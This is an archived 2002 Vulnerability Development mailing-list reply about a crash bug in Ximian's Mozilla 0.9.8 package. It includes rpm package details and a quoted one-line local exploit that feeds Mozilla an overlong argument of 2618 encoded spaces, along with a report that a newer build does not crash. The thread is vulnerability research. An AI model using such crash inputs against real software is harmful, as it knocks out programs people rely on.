Vulnerability Development mailing list archives

Re: Ximian Mozilla: The 2618 Bug

From: "Replugge [Rod]" <replugge () alcoholico org>
Date: 17 Feb 2002 19:31:24 +0100

if you use redcarpet for upgrade your packages you should have the buggy
version of mozilla:

[replugge@localhost replugge]$ rpm -qi mozilla-0.9.8-1.ximian.2

Name        : mozilla                      Relocations: (not
relocateable)
Version     : 0.9.8                             Vendor: Ximian, Inc.
Release     : 1.ximian.2                    Build Date: Wed 06 Feb 2002
01:52:24 AM CET
Install date: Thu 07 Feb 2002 03:51:42 PM CET      Build Host:
boris.ximian.com
Group       : Applications/Internet         Source RPM:
mozilla-0.9.8-1.ximian.2.src.rpm
Size        : 22510038                         License: NPL/MPL/GPL
Summary     : A web browser.
Description :
Mozilla is an open-source web browser, designed for standards
compliance, performance and portability.




 Sun, 2002-02-17 at 18:44, Vadim Berezniker wrote:

Replugge [Rod] wrote:


exploit:

Local:
bash#~ mozilla `perl -e "print '%20' x 2618"`


Using a nightly build 2002021513, mozilla opens and says "%20%20%20... 
not found". No segfault.


-- 
WWW: http://www.kryptolus.com
AIM: Kryptolus

-- 
/* 
Rodrigo Gutierrez                   <rodrigo () trustix com>
Trustix AS                         http://www.trustix.com 
*/

Current thread:

Ximian Mozilla: The 2618 Bug Replugge [Rod] (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug Vadim Berezniker (Feb 17)
  - Re: Ximian Mozilla: The 2618 Bug Replugge [Rod] (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug NyQuist (Feb 17)
  - Re: Ximian Mozilla: The 2618 Bug NyQuist (Feb 17)